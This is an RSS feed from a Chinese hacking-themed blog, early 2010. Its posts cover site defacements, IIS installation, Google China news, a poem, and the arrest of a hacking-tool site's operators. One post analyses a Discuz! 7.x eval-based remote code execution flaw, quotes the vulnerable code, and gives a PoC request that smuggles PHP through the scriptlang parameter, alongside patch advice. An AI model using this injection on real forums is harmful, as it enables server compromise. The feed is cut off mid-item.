﻿<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[天涯's blog]]></title> 
<link>http://www.rootkj.cn/index.php</link> 
<description><![CDATA[天涯-tianya-天涯博客-blog]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[天涯's blog]]></copyright>
<item>
<link>http://www.rootkj.cn/post/hntxg.php</link>
<title><![CDATA[湖南通信管被黑]]></title> 
<author>tianya &lt;admin@yourname.com&gt;</author>
<category><![CDATA[黑客安全]]></category>
<pubDate>Fri, 29 Jan 2010 10:07:04 +0000</pubDate> 
<guid>http://www.rootkj.cn/post/hntxg.php</guid> 
<description>
<![CDATA[ 
	湖南通信管被黑&nbsp;&nbsp;湖南icp被黑 <br/><br/><br/>被黑网站 http://www.xca.gov.cn/<br/><br/><a href="http://www.rootkj.cn/attachment.php?fid=4" target="_blank"><img src="http://www.rootkj.cn/attachment.php?fid=4" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/>Tags - <a href="http://www.rootkj.cn/go.php/tags/%25E6%25B9%2596%25E5%258D%2597%25E9%2580%259A%25E4%25BF%25A1%25E7%25AE%25A1/" rel="tag">湖南通信管</a> , <a href="http://www.rootkj.cn/go.php/tags/%25E9%2580%259A%25E4%25BF%25A1%25E7%25AE%25A1%25E8%25A2%25AB%25E9%25BB%2591/" rel="tag">通信管被黑</a>
]]>
</description>
</item><item>
<link>http://www.rootkj.cn/post/xpiis6.php</link>
<title><![CDATA[XP下安装IIS6.0方法]]></title> 
<author>tianya &lt;admin@yourname.com&gt;</author>
<category><![CDATA[默认分类]]></category>
<pubDate>Tue, 19 Jan 2010 19:34:14 +0000</pubDate> 
<guid>http://www.rootkj.cn/post/xpiis6.php</guid> 
<description>
<![CDATA[ 
	XP下安装IIS6.0的办法首先在运行中输入“c:&#92;windows&#92;inf&#92;sysoc.inf”，系统会自动使用记事本打开sysoc.inf这个文件。在sysoc.inf中找到“[Components]”这一段，找到类似“iis=iis.dll,OcEntry,iis.inf,hide,7”的一行字,把这一行替换为“iis=iis2.dll,OcEntry,iis2.inf,,7”。之后保存并关闭。在iis6.0安装包中找到iis.dl_和iis.in_两个文件，一起拷贝到硬盘某个目录（如C:&#92;）。打开开始菜单中的“命令提示符”，使用Expand命令解开iis.dl_和iis.if_，命令格式为：在运行中输入“CMD”然后回车，打开命令行模式，在命令行下输入下列的两条命令，在每一行命令结束后回车：Expand d:&#92;i386&#92;iis.dl_ c:&#92;windows&#92;system32&#92;setup&#92;iis2.dllExpand d:&#92;i386&#92;iis.in_ c:&#92;windows&#92;inf&#92;iis2.inf这 时，打开你的控制面板，并点击“添加删除程序”图标，之后点击“添加删除Windows组件”，你会发现，Internet信息服务（IIS）重新出现 了！接下来就是循规蹈矩安装IIS。但需要提醒一点，在安装过程中若跳出定位相关文件时，请把目录指向iis6.0安装包所在目录。最后还有一点注意的：如 果你在安装过程中，系统需要你插入Window Whistler CD或者需要你提供exch_adsiisex.dll这个文件，那是因为你按照默认的选项安装了IIS。要解决这个问题，只要在安装IIS的时候先点击 “详细信息”，然后取消对SMTP的选择（即，不要安装SMTP服务器），那么复制文件的时候就不会需要那两个文件了<br/>Tags - <a href="http://www.rootkj.cn/go.php/tags/xp/" rel="tag">xp</a> , <a href="http://www.rootkj.cn/go.php/tags/iis6/" rel="tag">iis6</a>
]]>
</description>
</item><item>
<link>http://www.rootkj.cn/post/Googlehf.php</link>
<title><![CDATA[Google恢复了在中国的运营]]></title> 
<author>tianya &lt;admin@yourname.com&gt;</author>
<category><![CDATA[默认分类]]></category>
<pubDate>Tue, 19 Jan 2010 07:13:54 +0000</pubDate> 
<guid>http://www.rootkj.cn/post/Googlehf.php</guid> 
<description>
<![CDATA[ 
	谷歌恢复在中国的运营了<a href="http://www.rootkj.cn/attachment.php?fid=3" target="_blank"><img src="http://www.rootkj.cn/attachment.php?fid=3" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/>人民网北京1月19日电 据法新社消息，当地时间18日下午，在宣布退出中国市场、员工停止工作一周后，美国网络巨头谷歌再次表示在中国的业务恢复正常运转。 <br/><br/>“在发表声明之后，我们给公司职员放了一段长假，以便运行测试和扫描，保证网络的安全可靠”，谷歌在回复法新社的询问中说，“谷歌中国的职员现在都已经回到工作岗位，一切业务正常运行。” <br/><br/>上周，新京报报道称谷歌中国的工程师不再能进入公司的全球数据库，不能正常工作。 <br/><br/>美国国务院发言人克劳利15日宣布，最早可能在下周初将就谷歌事件向中国发出外交照会。这位发言人说，“它将表达我们对这一事件的关注，并要求中国提供信息，解释这一事件是如何发生的，以及他们准备怎么处理这一问题。” <br/><br/>对此，中国表示谷歌事件不会影响中美关系，但是谷歌必须遵守中国的法律。商务部发言人上周五说，外国公司应该“尊重东道国的法律、公共利益、文化和传统，并为此承担社会责任”。 <br/><br/>Tags - <a href="http://www.rootkj.cn/go.php/tags/google%25E6%2581%25A2%25E5%25A4%258D/" rel="tag">google恢复</a>
]]>
</description>
</item><item>
<link>http://www.rootkj.cn/post/baidu.php</link>
<title><![CDATA[台湾百度被黑]]></title> 
<author>tianya &lt;admin@yourname.com&gt;</author>
<category><![CDATA[黑客安全]]></category>
<pubDate>Thu, 14 Jan 2010 13:02:35 +0000</pubDate> 
<guid>http://www.rootkj.cn/post/baidu.php</guid> 
<description>
<![CDATA[ 
	台湾百度被黑 -台湾百度怎么打不开台湾百度公告-台湾百度黑了<br/><br/><br/>台灣百度公告<br/><br/>台灣百度日前遭受有心人士破壞，導致主機系統癱瘓。<br/><br/>為有更好服務與品質，目前正在搶救資料訊息，請網友靜待佳音。<br/><br/>台灣百度非營利網站，請有心人士切勿以私心破壞大眾網友利益為重。<br/><br/>　<br/><br/>　<br/><br/>有心人士留言如下<br/><br/>Hello ,I am a Chinese Hacker,sorry to enter your server<br/><br/>I make a mistake that I thange your administrator's password<br/><br/>I am so sorry<br/><br/>you can write mail to me admin@0days.net.cn<br/><br/>My main aim is not doing some bad things.....<br/><a href="http://www.rootkj.cn/attachment.php?fid=2" target="_blank"><img src="http://www.rootkj.cn/attachment.php?fid=2" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/><br/><br/><br/>Tags - <a href="http://www.rootkj.cn/go.php/tags/%25E7%2599%25BE%25E5%25BA%25A6/" rel="tag">百度</a> , <a href="http://www.rootkj.cn/go.php/tags/%25E5%258F%25B0%25E6%25B9%25BE%25E7%2599%25BE%25E5%25BA%25A6/" rel="tag">台湾百度</a> , <a href="http://www.rootkj.cn/go.php/tags/%25E7%2599%25BE%25E5%25BA%25A6%25E8%25A2%25AB%25E9%25BB%2591/" rel="tag">百度被黑</a>
]]>
</description>
</item><item>
<link>http://www.rootkj.cn/read.php/11.htm</link>
<title><![CDATA[近期DZ论坛出现的漏洞导致某些论坛遭受攻击-公告]]></title> 
<author>tianya &lt;admin@yourname.com&gt;</author>
<category><![CDATA[默认分类]]></category>
<pubDate>Tue, 12 Jan 2010 18:35:55 +0000</pubDate> 
<guid>http://www.rootkj.cn/read.php/11.htm</guid> 
<description>
<![CDATA[ 
	感谢大家对本站的支持和厚爱,首先在此我要说一点,近期DZ论坛出现的漏洞导致某些论坛遭受攻击,为此我站接到一些安全爱好者的通知,本站的某些会员打着睿隆安全和我博客的旗号去测试某些网站的安全性!<br/>睿隆安全小组在任何时候、任何地点都强调，我们强烈反对任何利黑客技术进行的非法行为，同时我们不鼓励也不支持利用网络安全技术进行的“破坏”行为！！本版面之所以讨论网络/无线安全及黑客技术，是希望借此推动网络/无线安全技术的普及，达到提高网络/无线相关人员安全意识，从而进一步提升整体安全水平的目的！！<br/>任何因为个人或个别组织无线攻击行为导致法律问题的，一律后果自负，特此声明。也请大家在学习研究的同时，注意保护好自己的网络。<br/>
]]>
</description>
</item><item>
<link>http://www.rootkj.cn/post/yilimi.php</link>
<title><![CDATA[一米寻找]]></title> 
<author>tianya &lt;admin@yourname.com&gt;</author>
<category><![CDATA[情感随笔]]></category>
<pubDate>Sat, 09 Jan 2010 12:59:12 +0000</pubDate> 
<guid>http://www.rootkj.cn/post/yilimi.php</guid> 
<description>
<![CDATA[ 
	寻找一米阴凉 <br/>栖息躁动不止的魂 <br/>透视这熙攘的街头，还有人群 <br/><br/>寻找一米阳光 <br/>唤醒几近颓废的心 <br/>拥抱生活的美好，或者不美好 <br/><br/>寻找一米阴凉 <br/>冷静不时冲昏的头 <br/>坦对平淡的现实，哪怕碌碌、乃至险阻重重 <br/><br/>寻找一米阳光 <br/>晾晒隐着孤独的眼神 <br/>欣然依旧还在的诚挚，继续追求、哪怕憧憬 <br/><a href="http://www.rootkj.cn/attachment.php?fid=1" target="_blank"><img src="http://www.rootkj.cn/attachment.php?fid=1" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><br/>Tags - <a href="http://www.rootkj.cn/go.php/tags/%25E4%25B8%2580%25E7%25B2%2592%25E7%25B1%25B3/" rel="tag">一粒米</a>
]]>
</description>
</item><item>
<link>http://www.rootkj.cn/post/heiying.php</link>
<title><![CDATA[黑鹰网站被关 原因]]></title> 
<author>tianya &lt;admin@yourname.com&gt;</author>
<category><![CDATA[黑客安全]]></category>
<pubDate>Thu, 07 Jan 2010 06:03:18 +0000</pubDate> 
<guid>http://www.rootkj.cn/post/heiying.php</guid> 
<description>
<![CDATA[ 
	黑鹰网站打不开 被关了 大米被抓了 小耗子木马<br/><br/>黑鹰的客服说是服务器问题，呵呵都一个多月了没消息，暂时开了个临时论坛 域名 客服的qq号<br/><br/>那临时论坛空间放在美国，大家都知道，国内没证的论坛都关，注册资金100w-盈利性网站(听说广告都不能挂,挂广告就是盈利)<br/><br/>咱们草根站长,呵呵--我有100w,我还忙死忙活的去做网站。额~~<br/><br/> 重大的原因是关于小耗子木马吧,&nbsp;&nbsp;大家都知道 小耗子木马上了cctv...呵呵<br/>http://video.baidu.com/v?ct=301989888&rn=20&pn=0&db=0&s=25&word=%D0%A1%BA%C4%D7%D3%C4%BE%C2%ED<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;很多相关的视频&nbsp;&nbsp;是黑鹰的会员。。。。听说和黑鹰有关系 呵呵牵连了吧<br/><br/><br/> 黑鹰不低调，还在河南卫视上打广告 ，当然和河南政府部门有关系吧，现在出了问题，河南的不管了。。。呵呵<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;都怕cctv.记得cctv报光cn域名便宜 让很多人大批量注册，里面说18一个 不便宜呢， 过了2天 就下了命令个人不能注册cn域名<br/>&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;cn域名涨价.<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;呵呵，也希望黑鹰早日康复吧！&nbsp;&nbsp;我的博客，<a href="http://www.rootkj.cn" target="_blank">www.rootkj.cn</a> 新网不要关我玉米！<br/><br/>下面copy一个新浪的文章<br/>2名男子出售黑客软件获利数百万被捕2010年01月07日11:44&nbsp;&nbsp;汉网-武汉晚报 <br/>　　本报讯(记者 刘丰 通讯员 袁明 饶学兵 王萍 实习生 李学萍)两男子成立公司，专门提供“黑客”软件，吸收1万多名会员，并因此获利数百万元。昨悉，检察机关以涉嫌非法侵入计算机信息系统罪，依法对犯罪嫌疑人李强、张磊批准逮捕。<br/><br/>　　2006年3月，河南人李强和张磊联合成立了黑鹰科技有限公司，李强任公司董事长兼法人，张磊任公司总经理。二人以向会员提供“黑客”软件技术收取会费，获取非法利益。经侦查机关查明：二人自2007年至2009年10月，利用黑鹰科技公司“黑鹰安全网”提供“灰鸽子”、“小耗子下载者”等非法入侵、控制计算机信息系统程序工具软件供人下载使用，按照年收取200至996元不等数目的会费发展会员，共计发展会员1万余人，获取非法利益数百万元。并致使会员高某、韩某等人为了敲诈他人钱财，铤而走险，利用下载的上述工具攻击麻城市黄金桥开发区一网吧，造成40余家固定IP网络中断达60余小时。<br/><br/>　　麻城市检察院近日以涉嫌非法侵入计算机信息系统罪，对李强、张磊予以批捕。<br/><br/><br/>Tags - <a href="http://www.rootkj.cn/go.php/tags/%25E9%25BB%2591%25E9%25B9%25B0/" rel="tag">黑鹰</a> , <a href="http://www.rootkj.cn/go.php/tags/%25E7%25BD%2591%25E7%25AB%2599%25E8%25A2%25AB%25E5%2585%25B3/" rel="tag">网站被关</a> , <a href="http://www.rootkj.cn/go.php/tags/%25E5%25A4%25A7%25E7%25B1%25B3%25E8%25A2%25AB%25E6%258A%2593/" rel="tag">大米被抓</a>
]]>
</description>
</item><item>
<link>http://www.rootkj.cn/post/dzoady.php</link>
<title><![CDATA[dz 论坛7.27.1 0day 最新漏洞]]></title> 
<author>tianya &lt;admin@yourname.com&gt;</author>
<category><![CDATA[默认分类]]></category>
<pubDate>Wed, 06 Jan 2010 12:16:15 +0000</pubDate> 
<guid>http://www.rootkj.cn/post/dzoady.php</guid> 
<description>
<![CDATA[ 
	首先说一下，漏洞是t00ls核心群传出去的，xhming先去读的，然后我后来读的，读出来的都是代码执行，1月5日夜里11点多钟，在核心群的黑客们的要求下，xhming给了个poc，我给了个exp，确实发现的是同一个问题。截止夜里2点多种我下线，还只有t00ls核心群里几个人知道我给出的exp，可我怎么也想不到，经过半天时间，exp就满天飞了，而且确实出自昨天我的那个版本。<br/><br/>不难想象，exp流传的速度，A与B关系好，A发给B；B与C是好朋友，B发给C...总有人耐不住性子，泄露点风声，于是就人手一份。最受不了的是，竟然有些SB在群里拿来叫卖；实在不想说什么，要叫卖什么时候轮到你？人心不古，以后有的话还是自己藏着吧。<br/><br/>上午漏洞告诉了Saiy，DZ官方的补丁很快就出来了吧。<br/><br/>特别说明：产生漏洞的$scriptlang数组在安装插件后已经初始化，因此有安装插件的用户不受影响。<br/><br/>漏洞介绍：<br/><br/>Discuz！新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化，可以任意提交，从而可以执行任意PHP命令。<br/><br/>漏洞分析：<br/><br/>下面来分析下这个远程代码执行漏洞，这个问题真的很严重，可以直接写shell的：<br/><br/>一、漏洞来自showmessage函数：<br/><br/>function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;extract($GLOBALS, EXTR_SKIP);//危险的用法，未初始化的变量可以直接带进函数，直接导致了问题产生，from www.oldjun.com<br/>&nbsp;&nbsp;&nbsp;&nbsp;global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;<br/>&nbsp;&nbsp;&nbsp;&nbsp;define('CACHE_FORBIDDEN', TRUE);<br/>&nbsp;&nbsp;&nbsp;&nbsp;$hookscriptmessage = $show_message = $message;$messagehandle = 0;<br/>&nbsp;&nbsp;&nbsp;&nbsp;$msgforward = unserialize($_DCACHE['settings']['msgforward']);<br/>&nbsp;&nbsp;&nbsp;&nbsp;$refreshtime = intval($msgforward['refreshtime']);<br/>&nbsp;&nbsp;&nbsp;&nbsp;$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);<br/>&nbsp;&nbsp;&nbsp;&nbsp;$msgforward['refreshtime'] = $refreshtime * 1000;<br/>&nbsp;&nbsp;&nbsp;&nbsp;$url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);<br/>&nbsp;&nbsp;&nbsp;&nbsp;$seccodecheck = $seccodestatus & 2;<br/>&nbsp;&nbsp;&nbsp;&nbsp;if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if($fp = @fopen($statlogfile, 'a')) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@flock($fp, 2);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(is_array($funcstatinfo)) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$funcstatinfo = array_unique($funcstatinfo);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;foreach($funcstatinfo as $funcinfo) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fwrite($fp, funcstat_query($funcinfo, $message)."&#92;n");<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#125; else &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fwrite($fp, funcstat_query($funcstatinfo, $message)."&#92;n");<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fclose($fp);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$funcstatinfo = $GLOBALS['funcstatinfo'] = '';<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;write_statlog($message);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;if($url_forward && (!empty($quickforward) &#124;&#124; empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;updatesession();<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;dheader("location: ".str_replace('&amp;', '&', $url_forward));<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/>&nbsp;&nbsp;&nbsp;&nbsp;if(!empty($infloat)) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if($extra) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$messagehandle = $extra;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$extra = '';<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/>&nbsp;&nbsp;&nbsp;&nbsp;if(in_array($extra, array('HALTED', 'NOPERM'))) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$discuz_action = 254;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#125; else &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$discuz_action = 255;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;include language('messages');<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;$vars = explode(':', $message);//只要含:就可以了<br/>&nbsp;&nbsp;&nbsp;&nbsp;if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) &#123;//两个数字即可，用:分割<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;eval("&#92;$show_message = &#92;"".str_replace('"', '&#92;"', $scriptlang[$vars[0]][$vars[1]])."&#92;";");//$scriptlang未初始化，可以自定义，from www.oldjun.com<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#125; elseif(isset($language[$message])) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$pre = $inajax ? 'ajax_' : '';<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;eval("&#92;$show_message = &#92;"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."&#92;";");<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;unset($pre);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;......<br/>&#125; <br/><br/>二、DZ的全局机制导致了未初始化的参数可以任意提交：<br/><br/>foreach(array('_COOKIE', '_POST', '_GET') as $_request) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;foreach($$_request as $_key => $_value) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$_key&#123;0&#125; != '_' && $$_key = daddslashes($_value);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/>&#125; <br/><br/>三、misc.php正好有个可以自定义message的点，其实也是未初始化：<br/><br/>elseif($action == 'imme_binding' && $discuz_uid) &#123;<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;if(isemail($id)) &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$msn = $db->result_first("SELECT msn FROM &#123;$tablepre&#125;memberfields WHERE uid='$discuz_uid'");<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$msn = explode("&#92;t", $msn);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$msn = "$msn[0]&#92;t$id";<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$db->query("UPDATE &#123;$tablepre&#125;memberfields SET msn='$msn' WHERE uid='$discuz_uid'");<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;showmessage('msn_binding_succeed', 'memcp.php');<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#125; else &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if($result == 'Declined') &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;dheader("Location: memcp.php");<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#125; else &#123;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;showmessage($response['result']);//$response没有初始化，可以自定义，from www.oldjun.com<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#125;<br/><br/>&nbsp;&nbsp; &#125; <br/><br/>四、漏洞利用：<br/><br/>showmessage函数里$vars = explode(':', $message);然后message可以自己控制，于是就很容易了，参数是两个自定义的数组。<br/><br/>五、漏洞修复：<br/><br/>1.有补丁的打补丁；<br/>2.没有补丁可以暂时先注释引起漏洞的语句，或者对两个变量赋个值。<br/><br/>poc：<br/><br/>（应Saiy的要求，不发exp了！）注册一个用户登陆,然后提交<br/>misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=&#123;$&#123;phpinfo()&#125;&#125;<br/><br/>rn原文来自:http://bbs.rilone.com<br/>Tags - <a href="http://www.rootkj.cn/go.php/tags/0day/" rel="tag">0day</a> , <a href="http://www.rootkj.cn/go.php/tags/dz%25E6%25BC%258F%25E6%25B4%259E/" rel="tag">dz漏洞</a>
]]>
</description>
</item><item>
<link>http://www.rootkj.cn/post/51.php</link>
<title><![CDATA[51.com 和IT168 网站打不开 原因]]></title> 
<author>tianya &lt;admin@yourname.com&gt;</author>
<category><![CDATA[默认分类]]></category>
<pubDate>Tue, 05 Jan 2010 10:15:07 +0000</pubDate> 
<guid>http://www.rootkj.cn/post/51.php</guid> 
<description>
<![CDATA[ 
	IT168为国内大型的IT资讯门户，今天下午其注册于新网的域名已经被禁止解析，状态为Client-Hold，　IT168是中国指导IT产品采购的知名媒体品牌，是国内最大、最权威的导购资讯网站之一。自1999年创立以来，IT168以鲜明的定位、专业到位的服务，成为个人以及企业用户获取IT产品信息、导购资讯首选的网络媒体!<br/><br/>域名WHOIS信息如下:<br/><br/>　　Domain Name: IT168.COM<br/><br/>　　Registrar: XIN NET TECHNOLOGY CORPORATION<br/><br/>　　Whois Server: whois.paycenter.com.cn<br/><br/>　　Referral URL: http://www.xinnet.com<br/><br/>　　Name Server: NS1.IT168.COM<br/><br/>　　Name Server: NS2.IT168.COM<br/><br/>　　Status: clientHold<br/><br/>　　Status: clientTransferProhibited<br/><br/>　　Status: clientUpdateProhibited<br/><br/>　　Updated Date: 05-jan-2010<br/><br/>　　Creation Date: 25-may-1999<br/><br/>　　Expiration Date: 25-may-2013<br/><br/>　　具内部人士告诉了如下信息:<br/><br/><br/>51.com<br/>　随后编辑拨打新网总部电话得知， 51.com因涉嫌非法信息被Hold ，只有等域名所有人提交申请解除hold。<br/><br/>　　关于51.com<br/><br/>　　51.com成立于2005年8月，是目前中国最大的社交网站，由著名互联网人士庞升东创建， 截至2009年6月底，51.com注册用户数超过1.6亿，月独立登陆用户数超过3850万，日均PV超过3亿。51.com是由美国红杉资本中国基金(Sequoia Capital China)、巨人网络集团(Giant Interactive Group)、海纳亚洲创投(Susquehanna International Group)、英特尔资本(Intel Capital)、红点创投(Redpoint Ventures)等国际著名的企业和风险基金联合投资而成。<br/><br/><br/><br/>Tags - <a href="http://www.rootkj.cn/go.php/tags/51/" rel="tag">51</a> , <a href="http://www.rootkj.cn/go.php/tags/it/" rel="tag">it</a> , <a href="http://www.rootkj.cn/go.php/tags/168/" rel="tag">168</a> , <a href="http://www.rootkj.cn/go.php/tags/%25E5%259F%259F%25E5%2590%258D%25E8%25A7%25A3%25E6%259E%2590/" rel="tag">域名解析</a>
]]>
</description>
</item><item>
<link>http://www.rootkj.cn/post/wirelesssecurity.php</link>
<title><![CDATA[全国首套无线网络安全系列课程(第一讲)]]></title> 
<author>tianya &lt;admin@yourname.com&gt;</author>
<category><![CDATA[默认分类]]></category>
<pubDate>Tue, 05 Jan 2010 03:00:58 +0000</pubDate> 
<guid>http://www.rootkj.cn/post/wirelesssecurity.php</guid> 
<description>
<![CDATA[ 
	<span style="font-size: 18px;"><span style="font-family: 宋体;">&nbsp;&nbsp;&nbsp;&nbsp;欢迎收看由Rilone和NB5 给您带来的全国首套无线安全审计培训系列课程<br/>&nbsp;&nbsp;&nbsp;&nbsp;www.rilone.com&nbsp;&nbsp; www.nb5.cn<br/>无线安全-作为最近几年的热门话题,家庭和企业用户更是他们离不开的热点.为此我站联合经验丰富<br/><br/>的无线安全专家作为技术后盾.制作了"全国首套"最新最全的"无线网安攻防教程"希望为广大的无线安<br/><br/>全爱好者提供更好﹑更全﹑更新的技术.在此开设了"2009-2010无线安防视频教程".网络安全是一个时<br/><br/>代,无线安全已经到来.你应该做出选择!<br/>&nbsp;&nbsp; 中心思想-本课程以实战为主,理论为辅.好多同学问到为什么要学理论,咱们干脆就演练下工具的使<br/><br/>用不就好了吗?其实这个问题回答有千千万万,但我想告诉大家,我们是为了学习更丰富更有技术性的学<br/><br/>术.正如在你学习外语的时期,老师不会让大家死记句子和单词,更要学会"举一反三".包括现在所有培训<br/><br/>学校和讲师也只能达到抛砖引玉作用.</span></span><br/><a href="http://bbs.rilone.com" target="_blank"><span style="font-size: 24px;"><span style="color: #FF0000;">下载地址</span></span></a><br/><a href="http://bbs.rilone.com" target="_blank">bbs.rilone.com</a><br/>Tags - <a href="http://www.rootkj.cn/go.php/tags/wirelesssecurity/" rel="tag">wirelesssecurity</a> , <a 